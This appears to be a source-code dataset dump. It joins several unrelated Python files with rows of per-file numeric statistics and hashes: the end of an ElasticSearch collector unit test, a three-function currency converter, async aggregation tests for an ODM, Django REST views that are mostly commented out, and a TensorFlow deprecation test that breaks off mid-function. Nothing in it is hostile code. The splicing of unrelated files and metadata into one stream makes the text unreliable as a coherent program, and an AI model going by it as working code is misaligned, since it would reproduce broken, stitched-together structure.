'indices._all.indexing.index_time_in_millis': 29251475,
'indices._all.indexing.index_total': 35189321,
'indices._all.search.fetch_time_in_millis': 6962,
'indices._all.search.fetch_total': 4084,
'indices._all.search.query_time_in_millis': 41211,
'indices._all.search.query_total': 4266,
'indices._all.store.throttle_time_in_millis': 0,
'indices.logstash-adm-syslog.indexes_in_group': 3,
'indices.logstash-adm-syslog.datastore.size': 21903813340,
'indices.logstash-adm-syslog.docs.count': 35856619,
'indices.logstash-adm-syslog.docs.deleted': 0,
'indices.logstash-adm-syslog.get.exists_time_in_millis': 0,
'indices.logstash-adm-syslog.get.exists_total': 0,
'indices.logstash-adm-syslog.get.missing_time_in_millis': 0,
'indices.logstash-adm-syslog.get.missing_total': 0,
'indices.logstash-adm-syslog.get.time_in_millis': 0,
'indices.logstash-adm-syslog.get.total': 0,
'indices.logstash-adm-syslog.indexing.delete_time_in_millis': 0,
'indices.logstash-adm-syslog.indexing.delete_total': 0,
'indices.logstash-adm-syslog.indexing.index_time_in_millis': 29251475, # NOQA
'indices.logstash-adm-syslog.indexing.index_total': 35189321,
'indices.logstash-adm-syslog.search.fetch_time_in_millis': 6962,
'indices.logstash-adm-syslog.search.fetch_total': 4084,
'indices.logstash-adm-syslog.search.query_time_in_millis': 41211,
'indices.logstash-adm-syslog.search.query_total': 4266,
'indices.logstash-adm-syslog.store.throttle_time_in_millis': 0,
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_work_with_real_data_logstash_hourlymode(self, publish_mock):
returns = [
self.getFixture('stats'),
self.getFixture('logstash_hourly_indices_stats'),
]
urlopen_mock = patch('urllib2.urlopen', Mock(
side_effect=lambda *args: returns.pop(0)))
self.collector.config['logstash_mode'] = True
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
# check how many fixtures were consumed
self.assertEqual(urlopen_mock.new.call_count, 2)
# Omit all non-indices metrics, since those were already
# checked in previous test.
metrics = {
'indices.docs.count': 11968062,
'indices.docs.deleted': 2692068,
'indices.datastore.size': 22724243633,
'indices._all.docs.count': 35856619,
'indices._all.docs.deleted': 0,
'indices._all.datastore.size': 21903813340,
'indices._all.get.exists_time_in_millis': 0,
'indices._all.get.exists_total': 0,
'indices._all.get.missing_time_in_millis': 0,
'indices._all.get.missing_total': 0,
'indices._all.get.time_in_millis': 0,
'indices._all.get.total': 0,
'indices._all.indexing.delete_time_in_millis': 0,
'indices._all.indexing.delete_total': 0,
'indices._all.indexing.index_time_in_millis': 29251475,
'indices._all.indexing.index_total': 35189321,
'indices._all.search.fetch_time_in_millis': 6962,
'indices._all.search.fetch_total': 4084,
'indices._all.search.query_time_in_millis': 41211,
'indices._all.search.query_total': 4266,
'indices._all.store.throttle_time_in_millis': 0,
'indices.logstash-adm-syslog.indexes_in_group': 3,
'indices.logstash-adm-syslog.datastore.size': 21903813340,
'indices.logstash-adm-syslog.docs.count': 35856619,
'indices.logstash-adm-syslog.docs.deleted': 0,
'indices.logstash-adm-syslog.get.exists_time_in_millis': 0,
'indices.logstash-adm-syslog.get.exists_total': 0,
'indices.logstash-adm-syslog.get.missing_time_in_millis': 0,
'indices.logstash-adm-syslog.get.missing_total': 0,
'indices.logstash-adm-syslog.get.time_in_millis': 0,
'indices.logstash-adm-syslog.get.total': 0,
'indices.logstash-adm-syslog.indexing.delete_time_in_millis': 0,
'indices.logstash-adm-syslog.indexing.delete_total': 0,
'indices.logstash-adm-syslog.indexing.index_time_in_millis': 29251475, # NOQA
'indices.logstash-adm-syslog.indexing.index_total': 35189321,
'indices.logstash-adm-syslog.search.fetch_time_in_millis': 6962,
'indices.logstash-adm-syslog.search.fetch_total': 4084,
'indices.logstash-adm-syslog.search.query_time_in_millis': 41211,
'indices.logstash-adm-syslog.search.query_total': 4266,
'indices.logstash-adm-syslog.store.throttle_time_in_millis': 0,
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_work_with_real_0_90_data(self, publish_mock):
returns = [
self.getFixture('stats0.90'),
self.getFixture('indices_stats'),
]
urlopen_mock = patch('urllib2.urlopen', Mock(
side_effect=lambda *args: returns.pop(0)))
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
# check how many fixtures were consumed
self.assertEqual(urlopen_mock.new.call_count, 2)
# test some 0.90 specific stats
metrics = {
'cache.filter.size': 1700,
'cache.filter.evictions': 9,
'cache.id.size': 98,
'fielddata.size': 1448,
'fielddata.evictions': 12,
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_fail_gracefully(self, publish_mock):
urlopen_mock = patch('urllib2.urlopen', Mock(
return_value=self.getFixture('stats_blank')))
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
self.assertPublishedMany(publish_mock, {})
@patch.object(Collector, 'publish')
def test_multi_instances_with_real_data(self, publish_mock):
config = get_collector_config('ElasticSearchCollector', {
'instances': [
'esprodata01@10.10.10.201:9200',
'esprodata02@10.10.10.202:9200',
]})
self.collector = ElasticSearchCollector(config, None)
self.assertEqual(len(self.collector.instances), 2)
returns = [
self.getFixture('stats'),
self.getFixture('indices_stats'),
self.getFixture('stats2'),
self.getFixture('indices_stats2'),
]
urlopen_mock = patch('urllib2.urlopen', Mock(
side_effect=lambda *args: returns.pop(0)))
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
# check how many fixtures were consumed
self.assertEqual(urlopen_mock.new.call_count, 4)
metrics = {
'esprodata01.http.current': 1,
'esprodata02.http.current': 2,
'esprodata01.indices.docs.count': 11968062,
'esprodata02.indices.docs.count': 11968000,
'esprodata01.thread_pool.generic.threads': 1,
'esprodata02.thread_pool.generic.threads': 2,
'esprodata01.jvm.mem.pools.Par_Survivor_Space.max': 8716288,
'esprodata02.jvm.mem.pools.Par_Survivor_Space.max': 8710000,
'esprodata01.indices._all.docs.count': 4,
'esprodata02.indices._all.docs.count': 8,
}
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_work_with_real_1_7_data(self, publish_mock):
returns = [
self.getFixture('stats1.7'),
self.getFixture('indices_stats'),
]
urlopen_mock = patch('urllib2.urlopen', Mock(
side_effect=lambda *args: returns.pop(0)))
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
# check how many fixtures were consumed
self.assertEqual(urlopen_mock.new.call_count, 2)
# test some 1.7 specific stats
metrics = {
'segments.count': 7,
'segments.mem.size': 75726,
'segments.index_writer.mem.size': 0,
'segments.index_writer.mem.max_size': 469762048,
'segments.version_map.mem.size': 0,
'segments.fixed_bit_set.mem.size': 0
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
##########################################################################
if __name__ == "__main__":
unittest.main()
| 38.18913
| 90
| 0.605396
| 1,852
| 17,567
| 5.515119
| 0.12473
| 0.043078
| 0.066967
| 0.089289
| 0.845506
| 0.828079
| 0.806932
| 0.775798
| 0.775798
| 0.770805
| 0
| 0.05871
| 0.265042
| 17,567
| 459
| 91
| 38.272331
| 0.732399
| 0.029943
| 0
| 0.714697
| 0
| 0
| 0.355315
| 0.290025
| 0
| 0
| 0
| 0
| 0.057637
| 1
| 0.040346
| false
| 0.002882
| 0.023055
| 0
| 0.066282
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d48d8c9e7d1e33b3a265b09b602c2ec5e37126d9
| 101
|
py
|
Python
|
Ex03AP2/converter.py
|
icaromachado/AP2UNIGRANRIO
|
e7c1200463deeabd020a90ddc7f31764c7f3806a
|
[
"MIT"
] | null | null | null |
Ex03AP2/converter.py
|
icaromachado/AP2UNIGRANRIO
|
e7c1200463deeabd020a90ddc7f31764c7f3806a
|
[
"MIT"
] | null | null | null |
Ex03AP2/converter.py
|
icaromachado/AP2UNIGRANRIO
|
e7c1200463deeabd020a90ddc7f31764c7f3806a
|
[
"MIT"
] | null | null | null |
def dolar(n):
return n / 5.56
def euro(n):
return n / 6.02
def libra(n):
return n / 6.92
| 14.428571
| 19
| 0.554455
| 21
| 101
| 2.666667
| 0.52381
| 0.375
| 0.428571
| 0.321429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126761
| 0.29703
| 101
| 6
| 20
| 16.833333
| 0.661972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
d4f5369434750eeb290bb65a2fe60608ca2bd6e5
| 2,176
|
py
|
Python
|
tests/odm/query/test_aggregate_methods.py
|
yo-mo/beanie
|
1641dd81be64dd1dc11af667deb2e50feb2de2be
|
[
"Apache-2.0"
] | 574
|
2021-03-16T12:49:12.000Z
|
2022-03-30T11:45:33.000Z
|
tests/odm/query/test_aggregate_methods.py
|
yo-mo/beanie
|
1641dd81be64dd1dc11af667deb2e50feb2de2be
|
[
"Apache-2.0"
] | 148
|
2021-03-16T22:02:37.000Z
|
2022-03-31T21:04:47.000Z
|
tests/odm/query/test_aggregate_methods.py
|
yo-mo/beanie
|
1641dd81be64dd1dc11af667deb2e50feb2de2be
|
[
"Apache-2.0"
] | 53
|
2021-03-16T21:53:14.000Z
|
2022-03-31T12:51:51.000Z
|
from tests.odm.models import Sample
async def test_sum(preset_documents, session):
n = await Sample.find_many(Sample.integer == 1).sum(Sample.increment)
assert n == 12
n = await Sample.find_many(Sample.integer == 1).sum(
Sample.increment, session=session
)
assert n == 12
async def test_sum_without_docs(session):
n = await Sample.find_many(Sample.integer == 1).sum(Sample.increment)
assert n is None
n = await Sample.find_many(Sample.integer == 1).sum(
Sample.increment, session=session
)
assert n is None
async def test_avg(preset_documents, session):
n = await Sample.find_many(Sample.integer == 1).avg(Sample.increment)
assert n == 4
n = await Sample.find_many(Sample.integer == 1).avg(
Sample.increment, session=session
)
assert n == 4
async def test_avg_without_docs(session):
n = await Sample.find_many(Sample.integer == 1).avg(Sample.increment)
assert n is None
n = await Sample.find_many(Sample.integer == 1).avg(
Sample.increment, session=session
)
assert n is None
async def test_max(preset_documents, session):
n = await Sample.find_many(Sample.integer == 1).max(Sample.increment)
assert n == 5
n = await Sample.find_many(Sample.integer == 1).max(
Sample.increment, session=session
)
assert n == 5
async def test_max_without_docs(session):
n = await Sample.find_many(Sample.integer == 1).max(Sample.increment)
assert n is None
n = await Sample.find_many(Sample.integer == 1).max(
Sample.increment, session=session
)
assert n is None
async def test_min(preset_documents, session):
n = await Sample.find_many(Sample.integer == 1).min(Sample.increment)
assert n == 3
n = await Sample.find_many(Sample.integer == 1).min(
Sample.increment, session=session
)
assert n == 3
async def test_min_without_docs(session):
n = await Sample.find_many(Sample.integer == 1).min(Sample.increment)
assert n is None
n = await Sample.find_many(Sample.integer == 1).min(
Sample.increment, session=session
)
assert n is None
| 22.666667
| 73
| 0.670956
| 310
| 2,176
| 4.593548
| 0.103226
| 0.067416
| 0.134831
| 0.179775
| 0.912921
| 0.912921
| 0.912921
| 0.912921
| 0.908708
| 0.908708
| 0
| 0.015312
| 0.219669
| 2,176
| 95
| 74
| 22.905263
| 0.823322
| 0
| 0
| 0.701754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.280702
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.017544
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0791df26278f5de81917e6b733dc06d5ba3114ab
| 4,484
|
py
|
Python
|
sample_1/views.py
|
JordanEC/django-rest-and-angular
|
571eb2a7d966c2b7f1f520a764420207387709cd
|
[
"MIT"
] | null | null | null |
sample_1/views.py
|
JordanEC/django-rest-and-angular
|
571eb2a7d966c2b7f1f520a764420207387709cd
|
[
"MIT"
] | null | null | null |
sample_1/views.py
|
JordanEC/django-rest-and-angular
|
571eb2a7d966c2b7f1f520a764420207387709cd
|
[
"MIT"
] | null | null | null |
from django.http import Http404
from django.shortcuts import render
# Create your views here.
from rest_framework import status, permissions, generics
from rest_framework.decorators import api_view, permission_classes
from rest_framework.response import Response
from rest_framework.views import APIView
from .models import *
from .serializers import *
"""
class AuthorList(APIView):
@permission_classes((permissions.AllowAny,))
def get(self, request, format=None):
authors = Author.objects.all()
serializer = AuthorSerializer(authors, many=True)
return Response(serializer.data)
@permission_classes((permissions.IsAuthenticated,))
def post(self, request, format=None):
serializer = AuthorSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class AuthorDetail(APIView):
@permission_classes((permissions.AllowAny,))
def get_object(self, pk):
try:
return Author.objects.get(pk=pk)
except Author.DoesNotExist:
raise Http404
@permission_classes((permissions.AllowAny,))
def get(self, request, pk, format=None):
author = self.get_object(pk)
serializer = AuthorSerializer(author)
return Response(serializer.data)
@permission_classes((permissions.IsAuthenticated,))
def put(self, request, pk, format=None):
author = self.get_object(pk)
serializer = AuthorSerializer(author, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@permission_classes((permissions.IsAuthenticated,))
def delete(self, request, pk, format=None):
author = self.get_object(pk)
author.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
class BookList(APIView):
@permission_classes((permissions.AllowAny,))
def get(self, request, format=None):
books = Author.objects.all()
serializer = BookSerializer(books, many=True)
return Response(serializer.data)
@permission_classes((permissions.IsAuthenticated,))
def post(self, request, format=None):
serializer = BookSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class BookDetail(APIView):
@permission_classes((permissions.AllowAny,))
def get_object(self, pk):
try:
return Book.objects.get(pk=pk)
except Book.DoesNotExist:
raise Http404
@permission_classes((permissions.AllowAny,))
def get(self, request, pk, format=None):
book = self.get_object(pk)
serializer = AuthorSerializer(book)
return Response(serializer.data)
@permission_classes((permissions.IsAuthenticated,))
def put(self, request, pk, format=None):
book = self.get_object(pk)
serializer = AuthorSerializer(book, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@permission_classes((permissions.IsAuthenticated,))
def delete(self, request, pk, format=None):
book = self.get_object(pk)
book.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
"""
"""
class AuthorList(generics.ListCreateAPIView):
queryset = Author.objects.all()
serializer_class = AuthorSerializer
class AuthorDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Author.objects.all()
serializer_class = AuthorSerializer
class BookList(generics.ListCreateAPIView):
queryset = Book.objects.all()
serializer_class = BookSerializer
class BookDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Book.objects.all()
serializer_class = BookSerializer
"""
"""
class UserList(generics.ListAPIView):
queryset = User.objects.all()
serializer_class = UserSerializer
class UserDetail(generics.RetrieveAPIView):
queryset = User.objects.all()
serializer_class = UserSerializer
"""
| 33.214815
| 78
| 0.704059
| 476
| 4,484
| 6.510504
| 0.170168
| 0.063246
| 0.108422
| 0.072281
| 0.764117
| 0.75121
| 0.75121
| 0.718296
| 0.643433
| 0.643433
| 0
| 0.009159
| 0.196476
| 4,484
| 135
| 79
| 33.214815
| 0.850958
| 0.005129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
07d6bd6a48f513f6113cdf27b5108377596ba627
| 27,116
|
py
|
Python
|
tensorflow/python/util/deprecation_test.py
|
AlexChrisF/udacity
|
b7f85a74058fc63ccb7601c418450ab934ef5953
|
[
"Apache-2.0"
] | 65
|
2016-09-26T01:30:40.000Z
|
2021-08-11T17:00:41.000Z
|
tensorflow/python/util/deprecation_test.py
|
AlexChrisF/udacity
|
b7f85a74058fc63ccb7601c418450ab934ef5953
|
[
"Apache-2.0"
] | 7
|
2017-07-13T09:40:59.000Z
|
2019-04-08T22:46:51.000Z
|
tensorflow/python/util/deprecation_test.py
|
AlexChrisF/udacity
|
b7f85a74058fc63ccb7601c418450ab934ef5953
|
[
"Apache-2.0"
] | 11
|
2017-08-17T05:52:35.000Z
|
2021-06-19T04:39:45.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""tensor_util tests."""
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
class DeprecationTest(test.TestCase):
def _assert_subset(self, expected_subset, actual_set):
self.assertTrue(
actual_set.issuperset(expected_subset),
msg="%s is not a superset of %s." % (actual_set, expected_subset))
def test_deprecated_illegal_args(self):
instructions = "This is how you update..."
with self.assertRaisesRegexp(ValueError, "date"):
deprecation.deprecated(None, instructions)
with self.assertRaisesRegexp(ValueError, "date"):
deprecation.deprecated("", instructions)
with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"):
deprecation.deprecated("07-04-2016", instructions)
date = "2016-07-04"
with self.assertRaisesRegexp(ValueError, "instructions"):
deprecation.deprecated(date, None)
with self.assertRaisesRegexp(ValueError, "instructions"):
deprecation.deprecated(date, "")
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_with_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated(date, instructions)
def _fn(arg0, arg1):
"""fn doc.
Args:
arg0: Arg 0.
arg1: Arg 1.
Returns:
Sum of args.
"""
return arg0 + arg1
# Assert function docs are properly updated.
self.assertEqual("_fn", _fn.__name__)
self.assertEqual(
"fn doc. (deprecated)"
"\n"
"\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
"\nInstructions for updating:\n%s"
"\n"
"\nArgs:"
"\n arg0: Arg 0."
"\n arg1: Arg 1."
"\n"
"\nReturns:"
"\n Sum of args." % (date, instructions), _fn.__doc__)
# Assert calling new fn issues log warning.
self.assertEqual(3, _fn(1, 2))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_with_one_line_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated(date, instructions)
def _fn(arg0, arg1):
"""fn doc."""
return arg0 + arg1
# Assert function docs are properly updated.
self.assertEqual("_fn", _fn.__name__)
self.assertEqual(
"fn doc. (deprecated)"
"\n"
"\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
"\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__)
# Assert calling new fn issues log warning.
self.assertEqual(3, _fn(1, 2))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_no_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated(date, instructions)
def _fn(arg0, arg1):
return arg0 + arg1
# Assert function docs are properly updated.
self.assertEqual("_fn", _fn.__name__)
self.assertEqual(
"DEPRECATED FUNCTION"
"\n"
"\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
"\nInstructions for updating:"
"\n%s" % (date, instructions), _fn.__doc__)
# Assert calling new fn issues log warning.
self.assertEqual(3, _fn(1, 2))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_instance_fn_with_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
class _Object(object):
def __init(self):
pass
@deprecation.deprecated(date, instructions)
def _fn(self, arg0, arg1):
"""fn doc.
Args:
arg0: Arg 0.
arg1: Arg 1.
Returns:
Sum of args.
"""
return arg0 + arg1
# Assert function docs are properly updated.
self.assertEqual(
"fn doc. (deprecated)"
"\n"
"\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
"\nInstructions for updating:\n%s"
"\n"
"\nArgs:"
"\n arg0: Arg 0."
"\n arg1: Arg 1."
"\n"
"\nReturns:"
"\n Sum of args." % (date, instructions),
getattr(_Object, "_fn").__doc__)
# Assert calling new fn issues log warning.
self.assertEqual(3, _Object()._fn(1, 2))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_instance_fn_with_one_line_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
class _Object(object):
def __init(self):
pass
@deprecation.deprecated(date, instructions)
def _fn(self, arg0, arg1):
"""fn doc."""
return arg0 + arg1
# Assert function docs are properly updated.
self.assertEqual(
"fn doc. (deprecated)"
"\n"
"\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
"\nInstructions for updating:\n%s" % (date, instructions),
getattr(_Object, "_fn").__doc__)
# Assert calling new fn issues log warning.
self.assertEqual(3, _Object()._fn(1, 2))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_instance_fn_no_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
class _Object(object):
def __init(self):
pass
@deprecation.deprecated(date, instructions)
def _fn(self, arg0, arg1):
return arg0 + arg1
# Assert function docs are properly updated.
self.assertEqual(
"DEPRECATED FUNCTION"
"\n"
"\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
"\nInstructions for updating:"
"\n%s" % (date, instructions), getattr(_Object, "_fn").__doc__)
# Assert calling new fn issues log warning.
self.assertEqual(3, _Object()._fn(1, 2))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
def test_prop_wrong_order(self):
with self.assertRaisesRegexp(
ValueError,
"make sure @property appears before @deprecated in your source code"):
# pylint: disable=unused-variable
class _Object(object):
def __init(self):
pass
@deprecation.deprecated("2016-07-04", "Instructions.")
@property
def _prop(self):
return "prop_wrong_order"
@test.mock.patch.object(logging, "warning", autospec=True)
def test_prop_with_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
class _Object(object):
def __init(self):
pass
@property
@deprecation.deprecated(date, instructions)
def _prop(self):
"""prop doc.
Returns:
String.
"""
return "prop_with_doc"
# Assert function docs are properly updated.
self.assertEqual(
"prop doc. (deprecated)"
"\n"
"\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
"\nInstructions for updating:"
"\n%s"
"\n"
"\nReturns:"
"\n String." % (date, instructions), getattr(_Object, "_prop").__doc__)
# Assert calling new fn issues log warning.
self.assertEqual("prop_with_doc", _Object()._prop)
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_prop_no_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
class _Object(object):
def __init(self):
pass
@property
@deprecation.deprecated(date, instructions)
def _prop(self):
return "prop_no_doc"
# Assert function docs are properly updated.
self.assertEqual(
"DEPRECATED FUNCTION"
"\n"
"\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
"\nInstructions for updating:"
"\n%s" % (date, instructions), getattr(_Object, "_prop").__doc__)
# Assert calling new fn issues log warning.
self.assertEqual("prop_no_doc", _Object()._prop)
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
class DeprecatedArgsTest(test.TestCase):
def _assert_subset(self, expected_subset, actual_set):
self.assertTrue(
actual_set.issuperset(expected_subset),
msg="%s is not a superset of %s." % (actual_set, expected_subset))
def test_deprecated_illegal_args(self):
instructions = "This is how you update..."
date = "2016-07-04"
with self.assertRaisesRegexp(ValueError, "date"):
deprecation.deprecated_args(None, instructions, "deprecated")
with self.assertRaisesRegexp(ValueError, "date"):
deprecation.deprecated_args("", instructions, "deprecated")
with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"):
deprecation.deprecated_args("07-04-2016", instructions, "deprecated")
with self.assertRaisesRegexp(ValueError, "instructions"):
deprecation.deprecated_args(date, None, "deprecated")
with self.assertRaisesRegexp(ValueError, "instructions"):
deprecation.deprecated_args(date, "", "deprecated")
with self.assertRaisesRegexp(ValueError, "argument"):
deprecation.deprecated_args(date, instructions)
def test_deprecated_missing_args(self):
date = "2016-07-04"
instructions = "This is how you update..."
def _fn(arg0, arg1, deprecated=None):
return arg0 + arg1 if deprecated else arg1 + arg0
# Assert calls without the deprecated argument log nothing.
with self.assertRaisesRegexp(ValueError, "not present.*\\['missing'\\]"):
deprecation.deprecated_args(date, instructions, "missing")(_fn)
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_with_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated_args(date, instructions, "deprecated")
def _fn(arg0, arg1, deprecated=True):
"""fn doc.
Args:
arg0: Arg 0.
arg1: Arg 1.
deprecated: Deprecated!
Returns:
Sum of args.
"""
return arg0 + arg1 if deprecated else arg1 + arg0
# Assert function docs are properly updated.
self.assertEqual("_fn", _fn.__name__)
self.assertEqual(
"fn doc. (deprecated arguments)"
"\n"
"\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
"\nInstructions for updating:\n%s"
"\n"
"\nArgs:"
"\n arg0: Arg 0."
"\n arg1: Arg 1."
"\n deprecated: Deprecated!"
"\n"
"\nReturns:"
"\n Sum of args." % (date, instructions), _fn.__doc__)
# Assert calls without the deprecated argument log nothing.
self.assertEqual(3, _fn(1, 2))
self.assertEqual(0, mock_warning.call_count)
# Assert calls with the deprecated argument log a warning.
self.assertEqual(3, _fn(1, 2, True))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_with_one_line_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated_args(date, instructions, "deprecated")
def _fn(arg0, arg1, deprecated=True):
"""fn doc."""
return arg0 + arg1 if deprecated else arg1 + arg0
# Assert function docs are properly updated.
self.assertEqual("_fn", _fn.__name__)
self.assertEqual(
"fn doc. (deprecated arguments)"
"\n"
"\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
"\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__)
# Assert calls without the deprecated argument log nothing.
self.assertEqual(3, _fn(1, 2))
self.assertEqual(0, mock_warning.call_count)
# Assert calls with the deprecated argument log a warning.
self.assertEqual(3, _fn(1, 2, True))
self.assertEqual(1, mock_warning.call_count)
(args, _) = mock_warning.call_args
self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_no_doc(self, mock_warning):
date = "2016-07-04"
instructions = "This is how you update..."
@deprecation.deprecated_args(date, instructions, "deprecated")
def _fn(arg0, arg1, deprecated=True):
